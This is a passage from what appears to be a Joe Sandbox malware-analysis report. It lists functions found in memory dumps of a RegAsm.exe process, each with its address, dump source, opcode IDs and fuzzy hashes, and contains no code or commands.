                                                • Instruction Fuzzy Hash: 96318D31E106159BCB58CFAAD85469EB7B2FF89300F10C929E906EB340DB35EE42CB50
                                                Function 06D6D9C3 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50b84c3b8acaac4a8b4a339b0c7f55a0cee2be9f2374d689cd9903f20e85f640
                                                • Instruction ID: 807f8993e0ac7118f3cd35430d21c8b18f9104ab5591ce2388447037cf0aa12a
                                                • Opcode Fuzzy Hash: 50b84c3b8acaac4a8b4a339b0c7f55a0cee2be9f2374d689cd9903f20e85f640
                                                • Instruction Fuzzy Hash: BD316530F147199BDB65DFA9D480A9EB7B6FF85310F108529E405EB240EB70ED468B91
                                                Function 06D6D9C8 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95d63c1e90931ceaf0e87ac2f5b6194b10b61531c85cdb02d5598ae73db62053
                                                • Instruction ID: 6dd55b3047b49ba694278218437584559775979379627d92e5f169f38c769910
                                                • Opcode Fuzzy Hash: 95d63c1e90931ceaf0e87ac2f5b6194b10b61531c85cdb02d5598ae73db62053
                                                • Instruction Fuzzy Hash: F6316130F1470A9BDB65DF69E480A9EB7B2FF85310F108529E405EB240EB70ED468B91
                                                Function 06D620C8 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5705515280f127d34ba24bcfa36cc0c731194ef14db8af81e27b1012f6074d22
                                                • Instruction ID: 95effb2ba30489019cfed118cfd1a17ab48460423586c6f22ff09d5dc084bb79
                                                • Opcode Fuzzy Hash: 5705515280f127d34ba24bcfa36cc0c731194ef14db8af81e27b1012f6074d22
                                                • Instruction Fuzzy Hash: 65315C30E102159BCB58CF65D85469EB7B2EF89300F10C919EA06EB354DB75EE42CB50
                                                Function 02FB0F30 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a8c2b0b831f603a286c1217bb4309e2e0562fdd526b1fbfc7bee001b8ba4574
                                                • Instruction ID: 1946cb45f76470cde4ef0e727f963da5cf55ea3f7b65c74410c213424f518e70
                                                • Opcode Fuzzy Hash: 9a8c2b0b831f603a286c1217bb4309e2e0562fdd526b1fbfc7bee001b8ba4574
                                                • Instruction Fuzzy Hash: 2F316975F00A069FD725CF6AC894AABF7F2BF88750B148568D5199B610DB30E802CB90
                                                Function 06D63AF9 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6c8160dc571e86a0ff40e58c7d8d9160d72e99f3350bc195afc6da304425552
                                                • Instruction ID: c107e93ed8f2628b1257f7c5810deb635822b3c4a4d619680f81ab3ca6987595
                                                • Opcode Fuzzy Hash: c6c8160dc571e86a0ff40e58c7d8d9160d72e99f3350bc195afc6da304425552
                                                • Instruction Fuzzy Hash: EE213775F006199FDB50CF6DE880AAEBBF5EB48310F129469F905E7290E725D881CB90
                                                Function 02FB1E39 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6622b3175e8dc1b95fc2943700e3b2fa2fc96352ff32488cdf8a64d0fd6d3a7
                                                • Instruction ID: 9cb57e45071bfd2f0d9bb2569d74e52e6fdd29011b4b11623d784155312d0792
                                                • Opcode Fuzzy Hash: e6622b3175e8dc1b95fc2943700e3b2fa2fc96352ff32488cdf8a64d0fd6d3a7
                                                • Instruction Fuzzy Hash: 83314B75E00A069FD725DF6AC894AABFBF2BF88750B14C568D519DB710DB30E842CB90
                                                Function 06D63B08 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26bc87c44895d6c2a35e6a3d622b345ee03561f482dbc8af355c719617756b0c
                                                • Instruction ID: 9384368f48ae99eca161a5eaecbd5c3d72d22a4eab1b3697e7b2c9b0cfece567
                                                • Opcode Fuzzy Hash: 26bc87c44895d6c2a35e6a3d622b345ee03561f482dbc8af355c719617756b0c
                                                • Instruction Fuzzy Hash: 05211575F006199FDB50CF6EE880AAEBBF5EB48310F119069E915E7290E735DD418B90
                                                Function 06D655F0 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3047930d84b304759c96b7313d74f14b73e0fa888e9bf3554b6c8f7a3b47618d
                                                • Instruction ID: d2d7a03839fc6cf0667747564dde2815aefa85e513946c82fd11c95bee838d74
                                                • Opcode Fuzzy Hash: 3047930d84b304759c96b7313d74f14b73e0fa888e9bf3554b6c8f7a3b47618d
                                                • Instruction Fuzzy Hash: 0B21C035E002064FDF609BAAD880BBEBBE2FB85310F64882AE059D7251CA35D891C7D1
                                                Function 0159D006 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677446421.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_159d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 590b6754203511c907dbf9611373a35a0e86e144780bf43dd78923926110a0f9
                                                • Instruction ID: 8b44583578703c2f5184ee7b2f0660b7acdd5e8667204c7ffe2cc82ccb47b0ad
                                                • Opcode Fuzzy Hash: 590b6754203511c907dbf9611373a35a0e86e144780bf43dd78923926110a0f9
                                                • Instruction Fuzzy Hash: 54312B7550E3C09FDB13CB64D994705BF71AB47214F2985DBD888CF6A3C23A980ACB62
                                                Function 0159D3BC Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677446421.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_159d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31824285b78aba642d76a8c24ca5adb9980b6372161b502e9c66b0e7497a27d6
                                                • Instruction ID: 6d154072477ba948cf70aaeee0caf4becdef160d6ee38fb4439e24ac7a0b4e08
                                                • Opcode Fuzzy Hash: 31824285b78aba642d76a8c24ca5adb9980b6372161b502e9c66b0e7497a27d6
                                                • Instruction Fuzzy Hash: 5A21D071504204EFDF15DFA4D9C0B66BBA1FB84214F24C96DE90D4F242C3B6E446CA62
                                                Function 0159D20C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677446421.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_159d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59541bdcecb1b4177f6a2f6aa5173e935a21efe408cecfc7fcbe5d4e9b05f90d
                                                • Instruction ID: c415a3632ea4129a7702d970682872adae92a08d478084590d32588f32108728
                                                • Opcode Fuzzy Hash: 59541bdcecb1b4177f6a2f6aa5173e935a21efe408cecfc7fcbe5d4e9b05f90d
                                                • Instruction Fuzzy Hash: 0B2104725042449FDF15DF94D9C4B2ABBB5FB84324F24C9A9E9490F242C37AD446CA62
                                                Function 0159D044 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677446421.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_159d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7252dec680647c8269ee68d1ae918e7746a0df9107e96dd21bb2f5dcc85afc12
                                                • Instruction ID: 10412cf8011e9a5eabda41f63ab5f485c8920578d9a8c7073f9634408a7599e1
                                                • Opcode Fuzzy Hash: 7252dec680647c8269ee68d1ae918e7746a0df9107e96dd21bb2f5dcc85afc12
                                                • Instruction Fuzzy Hash: C321D0B5504204AFDF15CF64D9C4B26BBB1FB84314F24C96DE9494F242D736D447CA62
                                                Function 02FB27C8 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5051832e1a469b440df6f4fb068e8863483a18c99156903ce74450162f559942
                                                • Instruction ID: d43eb321ebd5096521643526b86650cde67a0d031c51640d39330e70d32a4840
                                                • Opcode Fuzzy Hash: 5051832e1a469b440df6f4fb068e8863483a18c99156903ce74450162f559942
                                                • Instruction Fuzzy Hash: A031E2B1D01218DFEB25CF9AC588BCEBBF4AF48314F24841AE904AB250C7B59845CFA5
                                                Function 02FB0006 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7bf63df476255fced2f8183cb2ae92a4774122d691ef52066bccec5dc35ff52f
                                                • Instruction ID: b9650187f274e6dce5c94ef5cb5c12f0b8772333e9ff2e9b6e53c9e9148c00ce
                                                • Opcode Fuzzy Hash: 7bf63df476255fced2f8183cb2ae92a4774122d691ef52066bccec5dc35ff52f
                                                • Instruction Fuzzy Hash: 1511C861B0E3D15FC71397798C206EABFBACE8355030D82EBD885CB5A7DA145C0AC762
                                                Function 02FB0A78 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4ca5f6abf573ea75a6a6790f0b645c22aed946f70c9e0c14dc18e93c048c98a
                                                • Instruction ID: 79d1b7e7fe9b064887fc67d8d2120e0dc31ad1f63787fe45331934a5f312b4ef
                                                • Opcode Fuzzy Hash: a4ca5f6abf573ea75a6a6790f0b645c22aed946f70c9e0c14dc18e93c048c98a
                                                • Instruction Fuzzy Hash: 9711B1317003069FD724AB75D8546ABB3E6FF85654B208A3CD21A9B350DF769C07CB91
                                                Function 06D64258 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03987b5fd376930c6081cedc275af0f1f28df1415914ddd9aeb3497d24efa2ed
                                                • Instruction ID: 1ca81422a71775e7899c26887323e4beba1418a02525c3152dac472319aa19cb
                                                • Opcode Fuzzy Hash: 03987b5fd376930c6081cedc275af0f1f28df1415914ddd9aeb3497d24efa2ed
                                                • Instruction Fuzzy Hash: 7901B131B102105FDBA192BE981576B77DADBCD720F30C82AF50ACB755ED65DC064392
                                                Function 06D63C18 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 011e66c6dd03077291aa05d9700e38e7d9b75b4d56672114f1abde0c9e8d2d20
                                                • Instruction ID: 2551b73baa41d1a585b314c63dd28c5eee81eadab4ee4e07e36018fb889e3843
                                                • Opcode Fuzzy Hash: 011e66c6dd03077291aa05d9700e38e7d9b75b4d56672114f1abde0c9e8d2d20
                                                • Instruction Fuzzy Hash: 68115E31B101288FDB589A7ED8146AE7BA6EBC8311F029539E506E7344DE75DC028BD1
                                                Function 06D6EDE9 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94913710b5b8c669e363f98071a0dea8e1b4702b533c143d591e874d9c42736d
                                                • Instruction ID: 68ee02cf917b3a793840a8c5c56b2910743602be72728ea8c983a74cf9d94ee9
                                                • Opcode Fuzzy Hash: 94913710b5b8c669e363f98071a0dea8e1b4702b533c143d591e874d9c42736d
                                                • Instruction Fuzzy Hash: EB01DF39B182105FDBA5967EA864B2F7BD6DBCA610F14892AF00ACB381DE15DC034391
                                                Function 02FB0A88 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0123416bd4e9eb2b9209cc79b9fd7941246fddfc7391f3ee77dfd688900c1a83
                                                • Instruction ID: fffe55770827cae0538bc5185ac5dac2400abc84c5e90cac86723a8177422be6
                                                • Opcode Fuzzy Hash: 0123416bd4e9eb2b9209cc79b9fd7941246fddfc7391f3ee77dfd688900c1a83
                                                • Instruction Fuzzy Hash: 2C116D707003069FD724EB65D4546ABB3E6FF85654720893CD11A9B750DF72AC06CBA1
                                                Function 06D638D0 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6476fa010126035a72f93255fd7c32a0b6738a2ee6b1b0ae873909ffcc033f37
                                                • Instruction ID: 1a36827e9dec84a2c23c70f8f296137338eaabad9aeab2253b6f81b08c18986d
                                                • Opcode Fuzzy Hash: 6476fa010126035a72f93255fd7c32a0b6738a2ee6b1b0ae873909ffcc033f37
                                                • Instruction Fuzzy Hash: 8E21C2B5D01259AFCB10CF9AD884ADEFFB4FB49324F14812AE518A7340C7746954CFA5
                                                Function 06D6A361 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05ecc8d3679af95215ea0bcd75392b2d11eaf86668ccd2fc8ae55f92dd44439f
                                                • Instruction ID: 1001302f7cb7da00db5c8ebf343870e4fc4a540e32f450424dc9583266a291c6
                                                • Opcode Fuzzy Hash: 05ecc8d3679af95215ea0bcd75392b2d11eaf86668ccd2fc8ae55f92dd44439f
                                                • Instruction Fuzzy Hash: 1201D430B012105FD761D7BDE895B6F77E6EB8A310F148469F14ADB341EA14DC418391
                                                Function 06D63C07 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c6908788bf8f0d9e9032faf273978ede2b1d41e1e8fac795938f9be7d5032f9
                                                • Instruction ID: bb2894d5f763d05305ab2fdf63d85cb1691e142fe852286c1b0a7f75e8041498
                                                • Opcode Fuzzy Hash: 0c6908788bf8f0d9e9032faf273978ede2b1d41e1e8fac795938f9be7d5032f9
                                                • Instruction Fuzzy Hash: 5901D431B101285BDF94866EDC246EF7AABEBC8310F124539E506D3280DE65CC0287D1
                                                Function 0159D3B7 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677446421.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_159d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c16b03a254a82660b956663a261485de8fcc5b72836e610ccc5344f67edd4d2
                                                • Instruction ID: 7f3a31c28b874819d1d5052a67a98e2d62deebb57547ad452510393f00910a7d
                                                • Opcode Fuzzy Hash: 5c16b03a254a82660b956663a261485de8fcc5b72836e610ccc5344f67edd4d2
                                                • Instruction Fuzzy Hash: 1811AC75504280CFCB12CF54D584B19BBB1FB44214F28C6A9D8494F656C37AE44ACB52
                                                Function 0159D207 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677446421.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_159d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7e53d8c9cef7d692991a98ccd321a4a220e1a4e757dd7e8e442a99daf23effa
                                                • Instruction ID: cc671b1361f303da69996db51e0e445f92e62ac24cfd5cccbec7cba139d0252d
                                                • Opcode Fuzzy Hash: a7e53d8c9cef7d692991a98ccd321a4a220e1a4e757dd7e8e442a99daf23effa
                                                • Instruction Fuzzy Hash: 13119D76504284CFDF12CF54D5C4B1ABBB1FB84324F28C6AAD8494B646C33AD44ACBA2
                                                Function 06D638D8 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4a40d341e72f3e734a395c239d99223401dc51957b268aa9836c987db4fd6a5
                                                • Instruction ID: aa9e17872bc19b6671e9ab801666fd5b855156bd5d1b760f11cd493b10d5b2a5
                                                • Opcode Fuzzy Hash: c4a40d341e72f3e734a395c239d99223401dc51957b268aa9836c987db4fd6a5
                                                • Instruction Fuzzy Hash: CB11D0B5D01259AFCB10CF9AD884BDEFBB4FB48324F10812AE918A7300C374A954CFA5
                                                Function 02FB0210 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21b37e881c47d51172aa3affa37f4e067cbb3eb81123e5ac3d6f81792351e754
                                                • Instruction ID: 760b9dc806bb4319abf5be4e6cf4d142dd27abb5ba9de204e363ea8557fa866e
                                                • Opcode Fuzzy Hash: 21b37e881c47d51172aa3affa37f4e067cbb3eb81123e5ac3d6f81792351e754
                                                • Instruction Fuzzy Hash: 271126B5C006488FDB20CFAAD445BDEFBF4EF48224F14851AD459A7310C778A506CFA5
                                                Function 06D64268 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e3c73f2a77cfba125470449b71d1d2d33952262b348fce87446e2e691ac21580
                                                • Instruction ID: e4b338930c5ff9398df3b9b3cdbfe2addf0e00bb1246c72e088de5ebfd7e3354
                                                • Opcode Fuzzy Hash: e3c73f2a77cfba125470449b71d1d2d33952262b348fce87446e2e691ac21580
                                                • Instruction Fuzzy Hash: F101A935B201104BDBA096BEA41472BA2DAEBCD720F20C83AF10ACB344DE66DC028395
                                                Function 06D6EDF8 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8c91c50214d273d556c3f0d8949d120c9a80094987a836f67734b90185059d7
                                                • Instruction ID: 2537019220a5e574b4e1d41b522d974ef5fdcb38b938d11015ccf4d52647d6ef
                                                • Opcode Fuzzy Hash: e8c91c50214d273d556c3f0d8949d120c9a80094987a836f67734b90185059d7
                                                • Instruction Fuzzy Hash: 71018C39B142109BDBA5967EA464B2F77D6EBCD620F10C93AF10ACB381DE25DC024385
                                                Function 02FB0218 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acb173e082209ed037b1786ca8195642ac4c815b3fee5ec29f248afd720d5969
                                                • Instruction ID: bb16c037933afae5464e87b8f230aa023fdf18e2c1f1ea4e3c945b30e863fd02
                                                • Opcode Fuzzy Hash: acb173e082209ed037b1786ca8195642ac4c815b3fee5ec29f248afd720d5969
                                                • Instruction Fuzzy Hash: 2811D2B6D006488FDB20CF9AD944BDEFBF4EF48224F14841AD859A7310D778A545CFA5
                                                Function 02FB23A0 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6023c922b698b904cb5effb6c5981570fc0a9747f40e9fa30fc1d0d33ad473ef
                                                • Instruction ID: ff4dff4c93b0003f28d9335b17ef9ebe4d4014463d689d5576066fa536a4fe94
                                                • Opcode Fuzzy Hash: 6023c922b698b904cb5effb6c5981570fc0a9747f40e9fa30fc1d0d33ad473ef
                                                • Instruction Fuzzy Hash: A71122B6D002488FCB20CF9AC945BDEFBF4EB48224F14841AD918A7740C338A544CFA5
                                                Function 06D6A370 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8167f5365ea544feeb52e5f428d675c417b5d4a268741cfe88fd0bccf7ba371
                                                • Instruction ID: 01866731aed29f43952413f357a3cd378fa2d0876a75749d4234624fa3f5424c
                                                • Opcode Fuzzy Hash: c8167f5365ea544feeb52e5f428d675c417b5d4a268741cfe88fd0bccf7ba371
                                                • Instruction Fuzzy Hash: 46013C31B102105BDBA1DABDE894B2F77D6FB89754F108829F54ADB344EA25DC428781
                                                Function 0158D8C9 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677288596.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_158d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c577a3033efca9f392c13f60589d2be6f44c6246a9884b350bef94aef42672cf
                                                • Instruction ID: b848b0b3f456b3f02eb0ecb6520c844f341123f983f5e23965455de10cdb180e
                                                • Opcode Fuzzy Hash: c577a3033efca9f392c13f60589d2be6f44c6246a9884b350bef94aef42672cf
                                                • Instruction Fuzzy Hash: B501A771408344AEEB205A56DD84B6AFBE8EF41624F18892AED586F2C3C7789840CA71
                                                Function 02FB23A8 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a98d8bde453f03aaa890594bae7839dfb35d6232439b6ddb8f0bde068a13600
                                                • Instruction ID: d9159b7409d83db0376aaf01ab41beb101f9642c291ec788ae09df8a9e791911
                                                • Opcode Fuzzy Hash: 1a98d8bde453f03aaa890594bae7839dfb35d6232439b6ddb8f0bde068a13600
                                                • Instruction Fuzzy Hash: 3311FEB6D002488FDB20CF9AC545BDEFBF4EB48224F24841AD958A7640C778A945CBA5
                                                Function 02FB2AED Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
